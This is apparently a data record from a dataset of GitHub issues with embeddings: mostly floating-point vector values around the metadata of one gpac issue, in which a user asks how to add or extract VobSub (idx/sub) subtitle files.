0.0020546054001897573, 0.045609328895807266, 0.004896081052720547, 0.0011529834009706974, -0.0055736638605594635, 0.017413146793842316, -0.0002008158335229382, 0.00597438495606184, -0.0069106146693229675, -0.008531712926924229, 0.0037558479234576225, -0.010914181359112263, 0.022586088627576828, 0.016276555135846138, -0.005774024408310652, 0.016582561656832695, -0.021507784724235535, 0.01331122126430273, -0.021697217598557472, -0.02255694568157196, -0.0064370352774858475 ]
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
I already googled-fu it but i found no info about this.
[Question]How to add and/or extract vobsub(idx,sub) files
https://api.github.com/repos/gpac/gpac/issues/2139/comments
1
2022-03-13T21:57:01
2022-03-14T16:25:55Z
https://github.com/gpac/gpac/issues/2139
1,167,704,796
2,139
false
This is a GitHub Issue repo:gpac owner:gpac Title : [Question]How to add and/or extract vobsub(idx,sub) files Issue date: --- start body --- I already googled-fu it but i found no info about this. --- end body ---
215
[ 0.013648740015923977, 0.05698281154036522, -0.019482694566249847, 0.012515867128968239, -0.00771981431171298, 0.02226399816572666, -0.01723051629960537, 0.02558799646794796, -0.03798853978514671, 0.048733871430158615, -0.017990287393331528, 0.009883804246783257, -0.0026151039637625217, 0.0021012411452829838, -0.012800781056284904, -0.002872883342206478, 0.0004680730926338583, 0.01034509390592575, 0.001975743332877755, -0.027772337198257446, 0.03332137688994408, -0.010412930510938168, 0.008981576189398766, 0.008140401914715767, -0.003778503043577075, 0.014639155939221382, -0.04512495920062065, 0.01118626818060875, -0.032832954078912735, -0.0035342909395694733, 0.021015804260969162, 0.002974638482555747, -0.015385358594357967, 0.009497134946286678, 0.012380193918943405, -0.005715240258723497, 0.02558799646794796, 0.03600770980119705, -0.010094097815454006, 0.0050063468515872955, -0.026402035728096962, -0.0178139116615057, -0.02533021569252014, 0.0072924429550766945, -0.04515209421515465, 0.03087925724685192, -0.0016950690187513828, 0.018193798139691353, 0.0003474509867373854, -0.04365968704223633, 0.026402035728096962, -0.02633419819176197, -0.010297607630491257, -0.0161451306194067, -0.010426498018205166, -0.024584012106060982, 0.0009344502468593419, -0.01671495847404003, 0.016674255952239037, 0.02659197896718979, -0.014584885910153389, 0.0026829408016055822, 0.030010947957634926, 0.03131341189146042, 0.01672852598130703, 0.013167099095880985, -0.028437135741114616, 0.01713554561138153, -0.027975846081972122, 0.045260634273290634, 0.009083331562578678, -0.0017052445327863097, 0.009090115316212177, -0.009334326721727848, 0.015860214829444885, -0.03410828113555908, 0.012122415006160736, -0.00045450575998984277, -0.015521032735705376, 0.021015804260969162, -0.03874831274151802, 0.013703009113669395, -0.04846252501010895, -0.007170337252318859, -0.005203073378652334, -0.03142194822430611, -0.01846514455974102, -0.05161014571785927, -0.004507747478783131, 0.015466762706637383, 0.04596613347530365, -0.007543438579887152, 0.05009060353040695, 0.003761543892323971, 0.015426061116158962, 0.019414857029914856, 0.016199398785829544, -0.026564843952655792, -0.03543788194656372, -0.028274327516555786, 0.0007661305135115981, -0.014557751826941967, 0.008432099595665932, -0.03717450052499771, 0.013987923040986061, 0.029603926464915276, 0.0260764192789793, -0.027813037857413292, 0.0043449392542243, 0.09068407118320465, 0.008581340312957764, -0.003089960664510727, 0.01671495847404003, 0.013234936632215977, 0.03693028911948204, 0.017596835270524025, -0.009171519428491592, -0.04664450138807297, -0.01076568104326725, -0.04504355415701866, 0.009205437265336514, 0.022223295643925667, -0.01630793698132038, 0.0165521502494812, -0.015100444667041302, 0.04686157777905464, -0.034813784062862396, 0.010697844438254833, 0.00864917691797018, 0.00041867949767038226, -0.047322869300842285, -0.02096153423190117, 0.020161060616374016, 0.010704628191888332, 0.042221549898386, 0.021680602803826332, -0.020405273884534836, 0.049737852066755295, -0.008174319751560688, 0.02965819649398327, -0.044093843549489975, -0.024244830012321472, 0.006593725178390741, -0.013201017864048481, -0.04319839924573898, -0.021721305325627327, -0.016023023054003716, -0.007808001711964607, -0.013363826088607311, -0.02227756567299366, 0.024068454280495644, -0.038965389132499695, 0.012163116596639156, -0.023213712498545647, 0.024719685316085815, 0.04254716634750366, 0.018845029175281525, 0.010331526398658752, 0.031259141862392426, -0.007611275650560856, -0.008479584939777851, -0.02128715068101883, 0.02625279501080513, 0.02234540320932865, -0.0037920703180134296, -0.040864814072847366, -0.012515867128968239, 0.009673510678112507, -0.009592106565833092, 0.01416429877281189, -0.0053048282861709595, 0.0027083794120699167, 0.01337739359587431, 0.0009013798553496599, -0.028192924335598946, -0.011790014803409576, 0.020147493109107018, 0.004148213192820549, -0.015453195199370384, -0.022169027477502823, -0.037147365510463715, 0.005158979445695877, 0.01056217122823, -0.015263252891600132, -0.024963898584246635, -0.013872601091861725, 0.04192306846380234, -0.048733871430158615, 0.04870673641562462, -0.02294236421585083, 0.027541691437363625, -0.0036801397800445557, 0.005596525967121124, -0.0012515867128968239, 0.03139481693506241, -0.0031679728999733925, -0.04672590643167496, 0.011111647821962833, 0.003049258841201663, -0.019021404907107353, -0.023390086367726326, -0.03774432837963104, 0.005935709457844496, -0.0034562789369374514, 0.0012337795924395323, 0.00923257227987051, -0.019523397088050842, 0.029631061479449272, 0.022481076419353485, -0.053699515759944916, 0.010507902130484581, -0.0008203998440876603, -0.013859033584594727, 0.025058869272470474, -0.024719685316085815, 0.0045755840837955475, -0.024136289954185486, -0.035220805555582047, -0.012760079465806484, -0.008384613320231438, 0.002313230885192752, -0.0030289078131318092, -0.004412775859236717, -0.005233599804341793, 0.010521468706429005, -0.03294149041175842, -0.02973959967494011, -0.011742529459297657, 0.003480021608993411, 0.03215458616614342, 0.061487168073654175, 0.0049317264929413795, -0.005233599804341793, -0.02632063254714012, -0.011620422825217247, -0.04064773768186569, 0.003910784609615803, -0.041407510638237, 0.021422823891043663, -0.01035187765955925, -0.047757022082805634, 0.03104206547141075, -0.0067497496493160725, -0.009944857098162174, -0.01797671988606453, 0.05226137861609459, -0.015575301833450794, 0.01689133234322071, -0.022155459970235825, 0.017990287393331528, 0.052722666412591934, 0.0012812652857974172, -0.0017128761392086744, 0.01436780858784914, -0.026293497532606125, 0.021490659564733505, 0.008995143696665764, -0.004029498901218176, -0.028844155371189117, -0.04545057564973831, 0.009700644761323929, -0.0067497496493160725, -0.015860214829444885, -0.024868926033377647, -0.019414857029914856, -0.05730842798948288, 0.01303820963948965, -0.03516653552651405, 0.0038734744302928448, -0.02211475744843483, 0.010568954981863499, -0.01912994310259819, -0.04914088919758797, 0.04441945627331734, 0.02029673382639885, -0.009137600660324097, -0.005582958925515413, -0.00155854772310704, 0.03294149041175842, 0.011355860158801079, -0.024706119671463966, 0.03248020261526108, 0.007082149386405945, 0.004945294000208378, 0.000551172997802496, -0.015453195199370384, -0.006471619475632906, 0.017501862719655037, -0.052885476499795914, -0.019835446029901505, 0.04091908410191536, 0.028518540784716606, -0.030417967587709427, 0.026469873264431953, -0.01880432851612568, 0.014137163758277893, -0.017257651314139366, -0.01379119697958231, 0.004253359977155924, -0.020500244572758675, 0.0006906621856614947, 0.020920831710100174, 0.023403653874993324, -0.005450677126646042, -0.04200447350740433, 0.0072042555548250675, -0.001059100148268044, 0.06338659673929214, -0.006444484461098909, -0.03915533050894737, 0.03372839838266373, -0.04064773768186569, -0.0446908064186573, -0.009775265119969845, 0.005437110085040331, 0.024896061047911644, -0.01804455742239952, -0.04241149127483368, -0.021341418847441673, -0.022046921774744987, 0.004487396217882633, -0.0005282781203277409, -0.046997252851724625, -0.01420500036329031, 0.010684276930987835, -0.02824719436466694, -0.03237166255712509, -0.015426061116158962, 0.01044006459414959, 0.0075027369894087315, -0.0035037645138800144, 0.004171955864876509, 0.027813037857413292, 0.0009157951571978629, 0.01573810912668705, -0.06740252673625946, -0.012970373034477234, 0.0003451191005297005, 0.013716576620936394, -0.012176684103906155, 0.035654958337545395, 0.009320760145783424, 0.04184166342020035, -0.021314285695552826, 0.0018722923705354333, -0.021639900282025337, 0.021327851340174675, 0.04170599207282066, 0.029522523283958435, 0.032181721180677414, 0.0008059845422394574, 0.011477965861558914, -0.008289642632007599, -0.007550222333520651, -0.019577665254473686, 0.0024319449439644814, -0.0024132898543030024, -0.011830717325210571, -0.0036801397800445557, -0.005816995166242123, 0.020283168181777, -0.01731192134320736, -0.0019672636408358812, 0.01820736564695835, 0.004921551328152418, 0.038042809814214706, -0.031503353267908096, -0.012963589280843735, -0.00009725023846840486, -0.04382249340415001, 0.010786032304167747, 0.002398026641458273, -0.03014662116765976, -0.0021215921733528376, -0.012454814277589321, -0.0036767481360584497, -0.008594906888902187, 0.003914176486432552, -0.022291133180260658, 0.004480612929910421, -0.05128452926874161, 0.006902382243424654, 0.0004502659721765667, -0.058665160089731216, 0.019496262073516846, -0.012339492328464985, -0.004280494526028633, 0.011735745705664158, -0.011288023553788662, -0.03185610473155975, -0.01714911311864853, 0.02832859754562378, -0.01978117600083351, -0.017868181690573692, -0.016932034865021706, 0.019089242443442345, -0.041407510638237, -0.005460852757096291, 0.022413238883018494, 0.03600770980119705, 0.03655040264129639, -0.04254716634750366, 0.01755613274872303, -0.010209420695900917, -0.022426806390285492, -0.01527682039886713, 0.0028423569165170193, 0.003917568363249302, 0.026863325387239456, -0.005243775434792042, -0.007021096535027027, -0.0252623800188303, -0.03958948701620102, -0.030580775812268257, 0.014299971982836723, 0.011986740864813328, -0.01946912705898285, 0.008194671012461185, -0.005077575333416462, 0.030824987217783928, 0.0022623531986027956, 0.01953696459531784, -0.021178610622882843, -0.01706770807504654, 0.029929542914032936, -0.0029831179417669773, 0.01969977095723152, 0.018614385277032852, 0.07152699679136276, -0.0628981664776802, 0.006936300545930862, -0.03934527561068535, 0.009151168167591095, -0.020554514601826668, 0.03484091907739639, 0.012292006053030491, -0.02774520218372345, -0.009836318902671337, -0.0082760751247406, 0.024896061047911644, -0.02800298109650612, 0.033836934715509415, -0.012285222299396992, -0.007014312781393528, 0.019821878522634506, -0.03885684907436371, -0.025275947526097298, -0.004012539517134428, 0.03956235200166702, -0.03785286843776703, -0.010467199608683586, -0.0009005319443531334, -0.0011498316889628768, 0.010942056775093079, 0.0008110722992569208, -0.006179921329021454, 0.005521905608475208, 0.00753665529191494, 0.05638584867119789, -0.01208849623799324, -0.018261633813381195, 0.02385137602686882, -0.009049412794411182, -0.002389546949416399, 0.02276599034667015, 0.026225659996271133, -0.026374900713562965, -0.022752422839403152, -0.011403345502912998, -0.04507068917155266, 0.020500244572758675, -0.0032866871915757656, 0.027772337198257446, 0.002311534946784377, -0.020432407036423683, 0.043686822056770325, 0.0002194092667195946, -0.02849140577018261, 0.036496132612228394, -0.026876892894506454, 0.01988971419632435, -0.05459496006369591, -0.005637228023260832, 0.021558497101068497, -0.02136855386197567, -0.020907264202833176, 0.0011159133864566684, -0.022671017795801163, -0.007611275650560856, 0.009042629040777683, 0.023376520723104477, 0.034732379019260406, 0.0016391037497669458, 0.0020028778817504644, 0.004399208817631006, 0.020934399217367172, -0.025370918214321136, -0.0021131124813109636, 0.007889405824244022, 0.02210118994116783, 0.008940874598920345, 0.0178139116615057, -0.025303080677986145, -0.019604800269007683, 0.05573461577296257, 0.02758239395916462, -0.023566462099552155, 0.02634776569902897, -0.0048944163136184216, -0.010379011742770672, -0.020161060616374016, -0.01797671988606453, -0.0011286328081041574, -0.05158301070332527, -0.01113199908286333, -0.020079657435417175, 0.014042193070054054, 0.006363080348819494, 0.029441118240356445, -0.043876763433218, -0.009897371754050255, 0.008954442106187344, -0.004026107024401426, 0.004422951489686966, -0.0034477992448955774, 0.029413985088467598, -0.006831153761595488, -0.008045430295169353, 0.0364147312939167, -0.002052059629932046, -0.01888573169708252, -0.006912557873874903, -0.01267189159989357, 0.038558367639780045, 0.012549785897135735, 0.02336295321583748, 0.027704499661922455, 0.003591952146962285, -0.01341131143271923, 0.0061460030265152454, -0.03655040264129639, 0.04895094782114029, -0.02748742327094078, -0.013574119657278061, -0.03305003046989441, -0.01638934202492237, 0.008981576189398766, 0.005949276965111494, -0.011600072495639324, 0.02766379714012146, -0.019279183819890022, -0.03248020261526108, -0.0169863048940897, 0.030743584036827087, 0.015670273452997208, 0.02401418425142765, 0.0050063468515872955, 0.035329341888427734, 0.008791633881628513, 0.01304499339312315, -0.015548166818916798, 0.02889842540025711, 0.034488167613744736, -0.023580029606819153, 0.03636046126484871, 0.01072497945278883, -0.00016376198618672788, 0.007306010462343693, -0.04414810985326767, -0.022738855332136154, 0.016443612053990364, -0.003703882684931159, -0.0008700054022483528, 0.0058102114126086235, -0.0006287612486630678, 0.010290823876857758, 0.006834545638412237, 0.019726905971765518, -0.004623069893568754, -0.0010141583625227213, 0.029441118240356445, 0.007529871538281441, -0.02765023149549961, 0.008710229769349098, -0.0026049285661429167, 0.0028779711574316025, -0.0002749505511019379, 0.011667909100651741, -0.057688310742378235, -0.00980918388813734, -0.012380193918943405, -0.016117995604872704, 0.011532235890626907, -0.020581647753715515, 0.024909628555178642, -0.002632063115015626, -0.004484004341065884, -0.0034189687576144934, 0.02060878276824951, -0.00812005065381527, -0.024163424968719482, 0.03853123262524605, -0.02584577538073063, -0.02343078888952732, -0.016769226640462875, -0.03375553339719772, -0.0023471491876989603, -0.014462780207395554, -0.03752725198864937, 0.016674255952239037, -0.02443477138876915, 0.026198524981737137, 0.05861089006066322, -0.020188195630908012, 0.004952077753841877, 0.003897217335179448, 0.0019452167907729745, 0.011790014803409576, -0.0022877920418977737, 0.006837937515228987, 0.014218567870557308, -0.013112829998135567, 0.011518668383359909, -0.02401418425142765, 0.025493023917078972, 0.04173312708735466, -0.011905337683856487, -0.011247321963310242, -0.010236554779112339, 0.0059594521299004555, -0.016674255952239037, 0.011152350343763828, -0.014774829149246216, -0.01113199908286333, -0.009531053714454174, 0.008981576189398766, 0.008818767964839935, -0.01287540141493082, 0.012312357313930988, 0.025954313576221466, -0.0016492792638018727, 0.008296426385641098, 0.0015788987511768937, 0.03869404271245003, -0.0289798304438591, -0.0016925251111388206, 0.0256693996489048, -0.06506894528865814, -0.013736927881836891, -0.00681080250069499, -0.042954184114933014, -0.03535647690296173, -0.00006269592995522544, -0.008235372602939606, 0.003052650485187769, -0.020283168181777, 0.027948712930083275, 0.026035718619823456, 0.0035410746932029724, -0.023132307454943657, -0.00567114632576704, -0.032018911093473434, -0.00165606290102005, -0.02060878276824951, 0.004941902123391628, 0.005935709457844496, -0.005494771059602499, 0.00432798033580184, -0.04075627774000168, 0.01994398422539234, 0.006797235459089279, 0.012041010893881321, 0.028518540784716606, -0.02973959967494011, 0.007339928764849901, 0.007326361257582903, -0.021151477470993996, 0.020242465659976006, 0.026700517162680626, -0.03844983130693436, -0.011708610691130161, -0.013282421976327896, 0.0012074928963556886, 0.0016738700214773417, -0.0033748748246580362, 0.008099699392914772, 0.01299750804901123, -0.04561338201165199, 0.0029814220033586025, -0.013560552150011063, 0.012522650882601738, 0.0072042555548250675, 0.02036457136273384, 0.04585759714245796, -0.004385641310364008, -0.010406146757304668, 0.028355732560157776, 0.006003546062856913, 0.014218567870557308, -0.0031662769615650177, -0.022426806390285492, 0.010270473547279835, 0.0020198370330035686, -0.011823933571577072, 0.0169727373868227, -0.033836934715509415, 0.005545648746192455, -0.01828876882791519, -0.017827479168772697, 0.023064471781253815, -0.017189813777804375, 0.0023251022212207317, 0.010304391384124756, 0.00007748221105430275, -0.0302280243486166, 0.0033731788862496614, 0.034325361251831055, -0.02461114712059498, -0.008309992961585522, 0.015303955413401127, 0.014842665754258633, -0.018532980233430862, -0.041461776942014694, -0.005745766684412956, 0.0178139116615057, 0.004270318895578384, 0.018736490979790688, 0.025737237185239792, 0.01731192134320736, 0.00001309035906160716, -0.018424442037940025, 0.005440501496195793, 0.019916849210858345, 0.014110029675066471, 0.0018892515217885375, -0.019428424537181854, 0.010975974611938, 0.017257651314139366, 0.003944702912122011, -0.008452449925243855, -0.0021894287783652544, 0.025872910395264626, -0.04995493218302727, -0.012773646973073483, -0.0016738700214773417, 0.01303820963948965, 0.009904155507683754, 0.013777629472315311, -0.04954791069030762, 0.004673947114497423, 0.03286008909344673, 0.015833081677556038, 0.020256033167243004, -0.06072739511728287, 0.0025133490562438965, -0.013845466077327728, 0.013221369124948978, -0.008995143696665764, 0.04067487269639969, -0.02020176313817501, 0.0037140583153814077, 0.00718390429392457, 0.01638934202492237, -0.0014745998196303844, -0.004015931393951178, -0.003537682816386223, 0.0011413521133363247, 0.0027829997707158327, 0.013295989483594894, -0.03223599120974541, -0.011654341593384743, 0.001865508733317256, -0.010704628191888332, -0.03657753765583038, -0.003822596976533532, 0.000019145312762702815, -0.024584012106060982, -0.0049317264929413795, -0.007624842692166567, 0.01680992916226387, -0.023892078548669815, 0.008296426385641098, -0.045586246997117996, 0.022548912093043327, 0.024231262505054474, -0.031991779804229736, 0.04246576130390167, 0.012970373034477234, 0.008554205298423767, 0.00509114284068346, 0.0008004728006199002, -0.005372664891183376, 0.025859342887997627, 0.005942493211477995, 0.028844155371189117, 0.007319577969610691, 0.03264300897717476, 0.01383189857006073, 0.02351219393312931, 0.0011269368696957827, 0.04129897058010101, -0.00811326690018177, -0.01632150448858738, -0.02136855386197567, 0.03153048828244209, 0.020405273884534836, -0.01729835383594036, 0.009775265119969845, 0.0043144128285348415, 0.010833517648279667, 0.0025676183868199587, -0.029196906834840775, 0.005077575333416462, 0.019686205312609673, -0.00833034422248602, -0.009958424605429173, 0.01288218516856432, -0.014394943602383137, 0.023322250694036484, 0.02906123362481594, -0.023390086367726326, 0.02201978676021099, 0.04333407059311867, -0.008750931359827518, 0.005525297485291958, -0.026022151112556458, -0.010758897289633751, 0.021327851340174675, 0.015263252891600132, 0.02973959967494011, 0.019821878522634506, 0.024082021787762642, 0.003805637825280428, 0.014191433787345886, -0.01714911311864853, 0.034895189106464386, 0.0030475629027932882, -0.0173797570168972, -0.0039040008559823036, 0.026035718619823456, -0.046508826315402985, -0.01937415637075901, -0.04075627774000168, -0.04783842712640762, 0.007808001711964607, -0.0013686050660908222, 0.008343911729753017, -0.04528776928782463, -0.017406892031431198, 0.019414857029914856, 0.0006978698656894267, -0.02774520218372345, 0.0020927616860717535, 0.019835446029901505, -0.025045301765203476, 0.013736927881836891, -0.04588472843170166, -0.02774520218372345, 0.011423696763813496, 0.0022131716832518578, 0.04300845414400101, 0.006081558298319578, -0.024570444598793983, -0.01762397028505802, 0.004914767574518919, -0.04927656427025795, 0.007272092159837484, -0.006539456080645323, 0.011213403195142746, 0.008764498867094517, -0.035654958337545395, 0.0058848317712545395, 0.0040328907780349255, -0.01150510087609291, -0.005335354711860418, -0.003941311035305262, -0.02261674962937832, -0.024326233193278313, -0.008343911729753017, -0.0060578156262636185, -0.028708482161164284, -0.0022894879803061485, 0.013567335903644562, -0.026876892894506454, 0.0015560038154944777, -0.023973481729626656, -0.00529804453253746, -0.019347021356225014, 0.007923324592411518, -0.0035580338444560766, 0.002162294229492545, -0.0007237325771711767, -0.022508209571242332, 0.000137793249450624, -0.0053794486448168755, 0.04330693557858467, -0.004843539092689753, -0.021300718188285828, -0.023064471781253815, -0.016416477039456367, -0.02393278107047081, -0.014476347714662552, 0.019821878522634506, -0.008215022273361683, 0.0006317290826700628, -0.0037378009874373674, 0.028952695429325104, -0.015249685384333134, -0.010514684952795506, 0.035736363381147385, -0.0002522676659282297, 0.014788396656513214, -0.004331372212618589, -0.00026201916625723243, -0.04015931487083435, -0.006342729553580284, 0.010317958891391754, -0.02036457136273384, 0.01812596060335636, 0.036713212728500366, -0.007665544748306274, 0.006247758399695158, 0.006244366522878408, 0.020269600674510002, -0.001678957836702466, -0.025859342887997627, -0.008215022273361683, 0.01072497945278883, 0.029169771820306778, 0.003098440356552601, -0.011803582310676575, -0.02044597454369068, 0.0009853277588263154, -0.005074183456599712, -0.00007891313725849614, -0.019523397088050842, -0.003591952146962285, -0.005969627760350704, -0.007590924389660358, -0.04835398495197296, 0.015426061116158962, 0.010446848347783089, 0.009470000863075256, -0.031096333637833595, 0.031991779804229736, 0.035980574786663055, -0.05152874067425728, 0.000611378054600209, -0.021911246702075005, -0.03592630475759506, -0.012013875879347324, 0.009408947080373764, -0.043876763433218, -0.038639772683382034, -0.025153839960694313, 0.007400981616228819, -0.023973481729626656, -0.012827916070818901, 0.02733818255364895, 0.023240845650434494, 0.021490659564733505, 0.016742093488574028, 0.0004812164406757802, -0.0023064471315592527, -0.018030989915132523, -0.00026986279408447444, -0.004965644795447588, 0.03467810899019241, -0.04184166342020035, -0.020093224942684174, -0.0020367964170873165, -0.02136855386197567, -0.039291005581617355, 0.03372839838266373, 0.013892952352762222, 0.023037336766719818, -0.020174628123641014, -0.004178739618510008, -0.012556569650769234, -0.0070550148375332355, -0.011776447296142578, 0.00019778631394729018, 0.02060878276824951, 0.00020679588487837464, -0.010507902130484581, 0.017949584871530533, 0.03323997184634209, 0.02391921356320381, -0.009246139787137508, 0.010155150666832924, 0.004609502386301756, 0.027609528973698616, 0.03505799546837807, -0.03237166255712509, 0.02949538826942444, 0.012515867128968239, 0.027473855763673782, -0.03237166255712509, -0.013085695914924145, -0.053536709398031235, 0.0031951076816767454, 0.014354241080582142, 0.0006690392619930208, 0.004619678016752005, 0.0006033224635757506, 0.0013279030099511147, -0.011708610691130161, 0.005599917843937874, -0.01969977095723152, 0.03592630475759506, -0.026361333206295967, -0.031204871833324432, 0.003200195264071226, 0.0009988951496779919, -0.02683619037270546, -0.0018875555833801627, 0.019021404907107353, -0.020676620304584503, 0.00008935362711781636, 0.0397794283926487, 0.018153095617890358, -0.014652722515165806, -0.0155345993116498, 0.016511447727680206, -0.008065781556069851, 0.020676620304584503, -0.028382867574691772, 0.025126706808805466, 0.030933525413274765, 0.005158979445695877, 0.008554205298423767, 0.0010328134521842003, 0.005121669266372919, 0.004185523372143507, 0.025045301765203476, -0.033999744802713394, -0.02104293741285801, -0.07299226522445679, -0.02740601822733879, 0.02857280895113945, 0.04515209421515465, -0.0017925843130797148, -0.02965819649398327, -0.013167099095880985, 0.00928005762398243, -0.015697408467531204, 0.02998381294310093, 0.0015186936361715198, -0.0022725288290530443, -0.009524269960820675, 0.003444407368078828, 0.025153839960694313, 0.044175244867801666, -0.007855487056076527, 0.0023556286469101906, -0.020975101739168167, -0.006715831346809864, 0.014272836968302727, 0.021490659564733505, 0.02220972813665867, -0.024868926033377647, -0.01714911311864853, 0.009707428514957428, -0.01896713487803936, -0.032751549035310745, -0.014856233261525631, 0.0023437573108822107, 0.030417967587709427, 0.012325924821197987, 0.006447876337915659, 0.006244366522878408, 0.023050904273986816, -0.024299098178744316, 0.017244083806872368, 0.0033189095556735992, -0.026795487850904465, 0.009307192638516426, -0.014462780207395554, -0.008004727773368359, -0.007631626445800066, -0.003322301432490349, -0.03817848488688469, 0.0364689975976944, 0.00660390080884099, -0.03551928699016571, 0.014177866280078888, 0.03139481693506241, -0.002079194178804755, 0.029848139733076096, -0.01804455742239952, -0.022508209571242332, -0.005905183032155037, -0.00949035119265318, -0.005576175171881914, -0.013350258581340313, -0.004541665781289339, 0.006783667951822281, 0.051393069326877594, 0.025791505351662636, -0.012359842658042908, 0.00003198393460479565, -0.0082828588783741, 0.0003033571410924196, 0.014422077685594559, 0.0002135795512003824, -0.0024370327591896057, 0.006322378758341074, -0.01630793698132038, -0.0067124394699931145, -0.004263535141944885, 0.012556569650769234, 0.005287869367748499, -0.002460775664076209, 0.0015458283014595509, -0.012909320183098316, 0.0047621349804103374, -0.0017400108044967055, -0.03516653552651405, 0.008432099595665932, 0.044093843549489975, -0.007584140636026859, 0.007848704233765602, -0.013601254671812057, -0.028220059350132942, -0.0128346998244524, 0.014544184319674969, 0.012495516799390316, -0.03815134987235069, -0.0013770846417173743, -0.0072788759134709835, 0.019157078117132187, 0.00490459194406867, -0.002045275876298547, 0.026198524981737137, -0.0182209312915802, -0.007360279560089111, 0.009720996022224426, 0.006485186517238617, -0.010012693703174591, -0.00018379501125309616, -0.01022977102547884, -0.02219616249203682, -0.028382867574691772, 0.022548912093043327, 0.016104428097605705, -0.003096744418144226, -0.03323997184634209, -0.004287278279662132, -0.022304700687527657, 0.008092915639281273, 0.021843411028385162, 0.007841920480132103, 0.021938381716609, 0.000510894984472543, 0.001673022168688476, -0.030499370768666267, -0.016009455546736717, 0.024312665686011314, -0.0042397924698889256, 0.018750058487057686, -0.006732790265232325, 0.008934090845286846, 0.008506719954311848, -0.030770717188715935, 0.007061798591166735, 0.016511447727680206, 0.02360716462135315, -0.0035478584468364716, -0.025113139301538467, -0.015561734326183796, -0.0009607370011508465, -0.009035845287144184, 0.03329424187541008, -0.029332580044865608, 0.00432798033580184, 0.007109283935278654, 0.004368682391941547, 0.022969499230384827, 0.00565079553052783, 0.0006872703670524061, -0.0019604801200330257, -0.015236117877066135, -0.005874656606465578, 0.007787650916725397, -0.004609502386301756, -0.0074416836723685265, -0.023647867143154144, -0.0025591386947780848, 0.009761698544025421, 0.0019825268536806107, 0.008710229769349098, -0.007590924389660358, -0.019672637805342674, 0.011769663542509079, -0.0032086749561131, -0.001940129091963172, -0.018695788457989693, 0.012217385694384575, 0.0013770846417173743, 0.01746116206049919, -0.009707428514957428, -0.00490459194406867, 0.03410828113555908, -0.015195416286587715, 0.0008199758594855666, -0.01564313843846321, 0.003941311035305262, -0.003507156390696764, -0.019021404907107353, -0.006953259464353323, -0.024529743939638138, 0.007563789840787649, 0.003778503043577075, -0.0008903564303182065, 0.02857280895113945, 0.022671017795801163, 0.0018485495820641518, -0.0012905928306281567, 0.002844052854925394, 0.00455523282289505, -0.0331043004989624, 0.01193247176706791, 0.0025896653532981873, -0.00881198514252901, -0.0007932651787996292, 0.02210118994116783, 0.031204871833324432, 0.0252488125115633, 0.01870935596525669, 0.02401418425142765, -0.0007508672424592078, 0.05085037648677826, -0.014028625562787056, 0.0017501863185316324, 0.0006965979118831456, 0.017990287393331528, 0.005637228023260832, -0.006193488836288452, 0.029251176863908768, 0.020513812080025673, 0.03443389758467674, -0.002657501958310604, -0.00790975708514452, -0.005630444269627333, 0.005409975070506334, 0.008377829566597939, 0.01828876882791519, 0.01188498642295599, 0.001502582454122603, 0.016335071995854378, 0.03570922836661339, 0.01316031627357006, -0.010412930510938168, 0.014082894660532475, -0.012888968922197819, -0.010535036213696003, 0.0016526711406186223, 0.008594906888902187, 0.014829098246991634, 0.03418968617916107, 0.009456433355808258, -0.005895007401704788, 0.010663925670087337, -0.02765023149549961, -0.043686822056770325, -0.0314762182533741, -0.00584073830395937, 0.008092915639281273, 0.0036631806287914515, -0.006658169906586409, 0.006017113570123911, 0.0072788759134709835, -0.013072128407657146, -0.02623922750353813, -0.018587250262498856, 0.006329162046313286, -0.016701390966773033, -0.012522650882601738, -0.007692679297178984, 0.006359688937664032, -0.0013092479202896357, 0.04995493218302727, -0.002584577538073063, -0.008208238519728184, -0.0017145720776170492, -0.023580029606819153, 0.001968959579244256, 0.02301020175218582, 0.012712594121694565, -0.01448991522192955, -0.00843888334929943, -0.03435249626636505, -0.0010565562406554818, -0.005399799905717373, 0.03123200684785843, -0.0027931754011660814, 0.003863298799842596, -0.027392450720071793, 0.005776293110102415, 0.003171364776790142, 0.010630007833242416, 0.0013940437929704785, -0.026727652177214622, -0.010066963732242584, 0.011267672292888165, -0.02005252242088318, -0.0032612483482807875, -0.030852122232317924, -0.004392425063997507, -0.00602389732375741, 0.004131253808736801, 0.012956805527210236, 0.0030390832107514143, -0.00033388365409336984, 0.0001307976053794846, -0.0064139580354094505, 0.028138654306530952, 0.0037920703180134296, 0.013594470918178558, 0.00330364634282887, -0.008215022273361683, -0.01713554561138153, 0.014829098246991634, 0.023064471781253815, -0.00623419089242816, 0.011084513738751411, 0.03484091907739639, 0.007618058938533068, -0.01155936997383833, 0.04015931487083435, -0.01647074520587921, 0.017501862719655037, 0.023417221382260323, 0.013770845718681812, -0.033674128353595734, 0.020920831710100174, -0.03191037476062775, 0.01383189857006073, 0.007611275650560856, -0.01895356923341751, -0.0038666906766593456, -0.01987614668905735, -0.00022894878929946572, -0.01155936997383833, 0.033077165484428406, 0.00432798033580184, 0.020934399217367172, 0.0074416836723685265, 0.00414142943918705, 0.006726006977260113, -0.015670273452997208, -0.01666068844497204, 0.048978082835674286, 0.018153095617890358, -0.0063393376767635345, 0.022046921774744987, -0.011695043183863163, -0.007509520277380943, -0.010195853188633919, -0.0091104656457901, -0.015887349843978882, -0.012536218389868736, 0.008927307091653347, -0.020758023485541344, 0.010331526398658752, -0.00881198514252901, 0.016850631684064865, 0.0051555875688791275, 0.020351003855466843, -0.008954442106187344, -0.0013177274959161878, -0.02318657748401165, -0.00546763651072979, 0.000009347417289973237, -0.01362838875502348, -0.018030989915132523, 0.0039955805987119675, 0.018573682755231857, -0.0010336614213883877, 0.016674255952239037, 0.0008127682376652956, 0.002516740933060646, -0.0016781098674982786, -0.02741958573460579, 0.005538864992558956, -0.016497880220413208, -0.01723051629960537, 0.015141147188842297, 0.0030543464235961437, -0.03277868404984474, -0.005565999541431665, 0.003424056340008974, -0.004273710772395134, -0.028627078980207443, 0.046508826315402985, -0.003710666438564658, -0.008594906888902187, 0.0173797570168972, 0.015290387906134129, 0.019347021356225014, -0.003612303175032139, 0.0030763933900743723, -0.0052675181068480015, -0.0072042555548250675, -0.010161934420466423, 0.028925560414791107, 0.007651977706700563, -0.009754914790391922, -0.013546984642744064, -0.00039154483238235116, -0.022508209571242332, -0.0012422591680660844, 0.006278284825384617, -0.014544184319674969, 0.030824987217783928, 0.01971333846449852, -0.01680992916226387, 0.006943084299564362, 0.020771590992808342, -0.006315595004707575, -0.04214014485478401, -0.002387851243838668, 0.013438446447253227, 0.020473109558224678, 0.005396408028900623, 0.0015509161166846752, -0.015941619873046875, 0.026022151112556458, 0.028762752190232277, 0.01921134814620018, 0.03334851190447807, 0.011084513738751411, 